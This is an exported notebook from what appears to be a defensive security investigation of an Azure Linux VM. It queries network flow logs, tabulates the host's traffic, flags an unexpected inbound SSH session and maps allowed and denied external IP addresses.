all_alert_host_ips = inv_host_entity.private_ips + inv_host_entity.public_ips
host_ips = {'\'{}\''.format(i.Address) for i in all_alert_host_ips}
alert_host_ip_list = ','.join(host_ips)

az_ip_where = f'''
| where (VMIPAddress in ({alert_host_ip_list}) 
        or SrcIP in ({alert_host_ip_list}) 
        or DestIP in ({alert_host_ip_list}) 
        ) and 
    (AllowedOutFlows > 0 or AllowedInFlows > 0)'''
print('getting data...')
az_net_query_byip = az_net_analytics_query.format(where_clause=az_ip_where,
                                                  start = ip_q_times.start,
                                                  end = ip_q_times.end)

net_default_cols = ['FlowStartTime', 'FlowEndTime', 'VMName', 'VMIPAddress', 
                'PublicIPs', 'SrcIP', 'DestIP', 'L4Protocol', 'L7Protocol',
                'DestPort', 'FlowDirection', 'AllowedOutFlows', 
                'AllowedInFlows']

%kql -query az_net_query_byip
az_net_comms_df = _kql_raw_result_.to_dataframe()
az_net_comms_df[net_default_cols]
getting data...
Out[77]:
FlowStartTime FlowEndTime VMName VMIPAddress PublicIPs SrcIP DestIP L4Protocol L7Protocol DestPort FlowDirection AllowedOutFlows AllowedInFlows
0 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
1 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
2 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
3 2019-02-18 06:59:14 2019-02-18 07:58:56 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 628.0 0.0
4 2019-02-18 07:33:36 2019-02-18 07:33:36 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
5 2019-02-18 07:24:15 2019-02-18 07:58:23 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
6 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
7 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
8 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
9 2019-02-18 06:59:02 2019-02-18 07:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 168.62.32.212, 52.239.220.64, 20.38.98.164] T https 443.0 O 2348.0 0.0
10 2019-02-18 07:33:36 2019-02-18 07:33:36 msticalertslxvm2 10.0.3.4 [91.189.88.149] T http 80.0 O 1.0 0.0
11 2019-02-18 05:33:18 2019-02-18 05:33:18 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
12 2019-02-18 05:33:18 2019-02-18 05:33:18 msticalertslxvm2 10.0.3.4 [91.189.88.152] T http 80.0 O 1.0 0.0
13 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
14 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
15 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
16 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
17 2019-02-18 06:33:29 2019-02-18 06:33:29 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
18 2019-02-18 06:15:59 2019-02-18 06:50:07 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
19 2019-02-18 05:59:00 2019-02-18 06:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
20 2019-02-18 05:59:00 2019-02-18 06:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
21 2019-02-18 05:59:00 2019-02-18 06:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
22 2019-02-18 06:33:29 2019-02-18 06:33:29 msticalertslxvm2 10.0.3.4 [91.189.88.162] T http 80.0 O 1.0 0.0
23 2019-02-18 06:32:37 2019-02-18 06:32:38 msticalertslxvm2 10.0.3.4 [91.189.92.41, 91.189.92.38] T https 443.0 O 2.0 0.0
24 2019-02-18 06:32:37 2019-02-18 06:32:38 msticalertslxvm2 10.0.3.4 [91.189.92.41, 91.189.92.38] T https 443.0 O 2.0 0.0
25 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
26 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
27 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
28 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
29 2019-02-18 19:35:19 2019-02-18 19:35:19 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
30 2019-02-18 19:21:08 2019-02-18 19:55:17 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
31 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
32 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
33 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
34 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
35 2019-02-18 19:35:19 2019-02-18 19:35:19 msticalertslxvm2 10.0.3.4 [91.189.88.149] T http 80.0 O 1.0 0.0
36 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
37 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
38 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
39 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
40 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
41 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
42 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
43 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
44 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
45 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
46 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
47 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
48 2019-02-18 13:59:01 2019-02-18 14:58:42 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 581.0 0.0
49 2019-02-18 13:59:01 2019-02-18 14:58:42 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 581.0 0.0
... ... ... ... ... ... ... ... ... ... ... ... ... ...
112 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
113 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
114 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
115 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
116 2019-02-18 08:33:42 2019-02-18 08:33:42 msticalertslxvm2 10.0.3.4 [91.189.88.161] T http 80.0 O 1.0 0.0
117 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
118 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
119 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
120 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
121 2019-02-18 10:34:04 2019-02-18 10:34:04 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
122 2019-02-18 10:14:56 2019-02-18 10:49:05 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
123 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
124 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
125 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
126 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
127 2019-02-18 10:34:04 2019-02-18 10:34:04 msticalertslxvm2 10.0.3.4 [91.189.88.152] T http 80.0 O 1.0 0.0
128 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
129 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
130 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
131 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
132 2019-02-18 11:34:13 2019-02-18 11:34:13 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
133 2019-02-18 11:23:13 2019-02-18 11:57:21 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
134 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
135 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
136 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
137 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
138 2019-02-18 11:34:13 2019-02-18 11:34:13 msticalertslxvm2 10.0.3.4 [91.189.91.23] T http 80.0 O 1.0 0.0
139 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
140 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
141 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
142 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
143 2019-02-18 12:05:33 2019-02-18 12:34:25 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 2.0 0.0
144 2019-02-18 12:31:29 2019-02-18 12:31:29 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 1.0 0.0
145 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
146 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
147 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
148 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
149 2019-02-18 12:05:33 2019-02-18 12:34:25 msticalertslxvm2 10.0.3.4 [91.189.91.23, 91.189.88.162] T http 80.0 O 2.0 0.0
150 2019-02-18 12:05:33 2019-02-18 12:34:25 msticalertslxvm2 10.0.3.4 [91.189.91.23, 91.189.88.162] T http 80.0 O 2.0 0.0
151 2019-02-18 16:30:27 2019-02-18 16:30:27 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 1.0 0.0
152 2019-02-18 17:04:35 2019-02-18 17:38:44 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
153 2019-02-18 17:35:04 2019-02-18 17:35:04 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
154 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
155 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
156 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
157 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
158 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0
159 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0
160 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0
161 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0

162 rows × 13 columns
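The output above contains many identical rows (one per element of the exploded `PublicIPs` list). A quick way to collapse such repeats is `DataFrame.drop_duplicates`, sketched here on a toy frame that mimics a few of the columns above:

```python
import pandas as pd

# Toy frame mimicking the repeated flow rows above
flows = pd.DataFrame({
    'FlowStartTime': ['2019-02-18 06:59:14'] * 4 + ['2019-02-18 07:33:36'],
    'DestPort': [443.0] * 4 + [80.0],
    'AllowedOutFlows': [628.0] * 4 + [1.0],
})

# Collapse exact duplicate rows (keep='first' is the default)
deduped = flows.drop_duplicates()
print(len(flows), '->', len(deduped))  # 5 -> 2
```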

Flow Time and Protocol Distribution

In [78]:
import warnings

with warnings.catch_warnings():
    warnings.simplefilter("ignore")

    # Combine in/out flow counts into a single magnitude measure
    az_net_comms_df['TotalAllowedFlows'] = (az_net_comms_df['AllowedOutFlows']
                                            + az_net_comms_df['AllowedInFlows'])
    # Distribution of flow counts per protocol, split by direction
    sns.catplot(x="L7Protocol", y="TotalAllowedFlows", col="FlowDirection",
                data=az_net_comms_df)
    # Flow volume over time, colored by protocol
    sns.relplot(x="FlowStartTime", y="TotalAllowedFlows",
                col="FlowDirection", kind="line",
                hue="L7Protocol", data=az_net_comms_df).set_xticklabels(rotation=50)

Isolated SSH Traffic

In [79]:
az_net_comms_df.query('FlowDirection == \'I\' & L7Protocol == \'ssh\'')[net_default_cols]
Out[79]:
FlowStartTime FlowEndTime VMName VMIPAddress PublicIPs SrcIP DestIP L4Protocol L7Protocol DestPort FlowDirection AllowedOutFlows AllowedInFlows
93 2019-02-18 15:29:18 2019-02-18 15:29:18 None None 23.97.60.214 10.0.3.4 T ssh 22.0 I 0.0 1.0
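The filter above embeds single quotes inside a single-quoted Python string; writing the pandas `query` expression in double quotes avoids the backslash escaping. A toy example of the same filter:

```python
import pandas as pd

df = pd.DataFrame({'FlowDirection': ['I', 'O', 'I'],
                   'L7Protocol': ['ssh', 'https', 'ntp']})

# Equivalent to 'FlowDirection == \'I\' & L7Protocol == \'ssh\''
ssh_in = df.query("FlowDirection == 'I' & L7Protocol == 'ssh'")
print(len(ssh_in))
```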

This looks suspicious, so record the findings

In [80]:
ext_ip_list = az_net_comms_df.query('FlowDirection == \'I\' & L7Protocol == \'ssh\'')['AllExtIPs'].tolist()

for ip in ext_ip_list:
    if not ip:
        continue
    # Check IP is not already in our list of entities
    if ip in [curr_ip.Address for curr_ip in alert_ip_entities]:
        continue
    ip_entity = entity.IpAddress(Address=ip)
    iplocation.lookup_ip(ip_entity=ip_entity)
    
    alert_ip_entities.append(ip_entity)
    
add_observation(Observation(caption='Outlier SSH session on Linux Host.',
                            description='''Plot of in/out flows shows unexpected ssh inbound. 
Ip Address confirmed as logon source for SSH.''',
                            item = az_net_comms_df.query('FlowDirection == \'I\' & L7Protocol == \'ssh\''),
                            link='net_flow_graphs'))
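The membership test in the loop above rebuilds a list of addresses on every iteration; for longer IP lists, maintaining a set of seen addresses keeps the check O(1). A generic sketch of that pattern (the entity objects are simplified to plain dicts here, so the names are illustrative only):

```python
# Simplified stand-ins for the IpAddress entities used above
alert_ip_entities = [{'Address': '23.97.60.214'}]
ext_ip_list = ['23.97.60.214', '81.22.45.116', '', '81.22.45.116']

# Seed the seen-set from the existing entities, then check/add in O(1)
seen = {e['Address'] for e in alert_ip_entities}
for ip in ext_ip_list:
    if not ip or ip in seen:
        continue  # skip empties and already-recorded addresses
    seen.add(ip)
    alert_ip_entities.append({'Address': ip})

print(len(alert_ip_entities))  # 2
```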

Interactive Flow Timeline

In [81]:
nbdisp.display_timeline(data=az_net_comms_df.query('AllowedOutFlows > 0'),
                         overlay_data=az_net_comms_df.query('AllowedInFlows > 0'),
                         alert=security_alert, title='Network Flows (out=blue, in=green)',
                         time_column='FlowStartTime',
                         source_columns=['FlowType', 'AllExtIPs', 'L7Protocol', 'FlowDirection'],
                         height=300)
Alert start time =  2019-02-18 15:29:22


GeoLocation Mapping

In [86]:
ip_locs_in = set()
ip_locs_out = set()
seen_ips = set()
for _, row in az_net_comms_df.iterrows():
    ip = row.AllExtIPs

    # Track seen addresses as strings - comparing the raw IP against the
    # entity sets would never match, causing repeated geolocation lookups
    if not ip or ip in seen_ips:
        continue
    seen_ips.add(ip)
    ip_entity = entity.IpAddress(Address=ip)
    iplocation.lookup_ip(ip_entity=ip_entity)
    if not ip_entity.Location:
        continue
    ip_entity.AdditionalData['protocol'] = row.L7Protocol
    # Bucket by flow direction for separate map layers
    if row.FlowDirection == 'I':
        ip_locs_in.add(ip_entity)
    else:
        ip_locs_out.add(ip_entity)

flow_map = FoliumMap()
display(HTML('<h3>External IP Addresses communicating with host</h3>'))
display(HTML('Numbered circles indicate multiple items - click to expand'))
display(HTML('Location markers: Blue = outbound, Purple = inbound, Green = Host'))

flow_map.add_ip_cluster(ip_entities=inv_host_entity.public_ips,
                        color='green')
flow_map.add_ip_cluster(ip_entities=ip_locs_out,
                        color='blue')
flow_map.add_ip_cluster(ip_entities=ip_locs_in,
                        color='purple')

display(flow_map.folium_map)
display(Markdown('<p style="color:red">Warning: the folium mapping library '
                 'does not display correctly in some browsers.</p><br>'
                 'If you see a blank image please retry with a different browser.'))

External IP Addresses communicating with host

Numbered circles indicate multiple items - click to expand
Location markers: Blue = outbound, Purple = inbound, Green = Host

Warning: the folium mapping library does not display correctly in some browsers.


If you see a blank image please retry with a different browser.
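The geolocation lookups are the slow part of the loop above, so it pays to reduce the work to one lookup per distinct address. A sketch of extracting the unique external IPs first with pandas (the column name `AllExtIPs` matches the flow data; the values here are illustrative):

```python
import pandas as pd

# Toy frame standing in for az_net_comms_df
df = pd.DataFrame({
    'AllExtIPs': ['13.71.172.130', '13.71.172.130', '91.189.94.4', None],
    'FlowDirection': ['O', 'O', 'O', 'I'],
})

# Drop empties, then each distinct address needs only one lookup
unique_ips = sorted(df['AllExtIPs'].dropna().unique())
print(unique_ips)
```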

Look at 'Denied' Flows - who's trying to get in from where?

Optional and can take a long time

In [89]:
# Set this to False to skip this optional (and potentially slow) section
if True:
    az_ip_where = f'''
    | where (VMIPAddress in ({alert_host_ip_list}) 
            or SrcIP in ({alert_host_ip_list}) 
            or DestIP in ({alert_host_ip_list}) 
            )'''

    az_net_query_byip = az_net_analytics_query.format(where_clause=az_ip_where,
                                                      start = ip_q_times.start,
                                                      end = ip_q_times.end)
    %kql -query az_net_query_byip
    az_net_comms_all_df = _kql_raw_result_.to_dataframe()

    ip_all = set()
    ip_locs_in_allow = set()
    ip_locs_out_allow = set()
    ip_locs_in_deny = set()
    ip_locs_out_deny = set()
    for _, row in az_net_comms_all_df.iterrows():
        if not row.PublicIPs:
            continue
        for ip in row.PublicIPs:
            if ip in ip_all:
                continue
            ip_all.add(ip)
            ip_entity = entity.IpAddress(Address=ip)
            iplocation.lookup_ip(ip_entity=ip_entity)
            if not ip_entity.Location:
                print("No location information for IP: ", ip)
                continue
            ip_entity.AdditionalData['protocol'] = row.L7Protocol
            if row.FlowDirection == 'I':
                if row.AllowedInFlows > 0:
                    ip_locs_in_allow.add(ip_entity)
                elif row.DeniedInFlows > 0:
                    ip_locs_in_deny.add(ip_entity)
            else:
                if row.AllowedOutFlows > 0:
                    ip_locs_out_allow.add(ip_entity)
                elif row.DeniedOutFlows > 0:
                    ip_locs_out_deny.add(ip_entity)

    flow_map = FoliumMap()
    display(HTML('<h3>External IP Addresses Blocked and Allowed communicating with host</h3>'))
    display(HTML('Numbered circles indicate multiple items - click to expand.'))
    display(HTML('Location markers: Blue = outbound, Purple = inbound, Red = in denied, Cyan = out denied.'))

    flow_map.add_ip_cluster(ip_entities=ip_locs_in_allow,
                            color='purple')
    flow_map.add_ip_cluster(ip_entities=ip_locs_out_allow,
                            color='blue')
    flow_map.add_ip_cluster(ip_entities=ip_locs_in_deny,
                            color='red')
    flow_map.add_ip_cluster(ip_entities=ip_locs_out_deny,
                            color='cyan')
    display(flow_map.folium_map)
    
    display(Markdown('<p style="color:red">Warning: the folium mapping library '
                     'does not display correctly in some browsers.</p><br>'
                     'If you see a blank image please retry with a different browser.'))
No location information for IP:  193.32.161.50
No location information for IP:  88.214.26.103
No location information for IP:  81.22.45.116
No location information for IP:  88.214.26.77
No location information for IP:  81.22.45.102
No location information for IP:  88.214.26.38
No location information for IP:  141.98.80.150
No location information for IP:  193.32.160.69
No location information for IP:  194.61.24.198
No location information for IP:  81.22.45.81
No location information for IP:  81.22.45.106

External IP Addresses Blocked and Allowed communicating with host

Numbered circles indicate multiple items - click to expand.
Location markers: Blue = outbound, Purple = inbound, Red = in denied, Cyan = out denied.
RuntimeWarning: Invalid location information for IP: 194.113.106.162
RuntimeWarning: Invalid location information for IP: 194.147.32.125
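The cell above partitions each flow into one of four buckets (in/out crossed with allowed/denied). The same branching logic, reduced to a small standalone function that is easy to test:

```python
def classify_flow(direction, allowed_in, denied_in, allowed_out, denied_out):
    """Mirror the bucketing used for the allowed/denied flow map."""
    if direction == 'I':
        if allowed_in > 0:
            return 'in_allow'
        if denied_in > 0:
            return 'in_deny'
    else:
        if allowed_out > 0:
            return 'out_allow'
        if denied_out > 0:
            return 'out_deny'
    return None  # no flows recorded in either state

print(classify_flow('I', 0, 3, 0, 0))  # in_deny
```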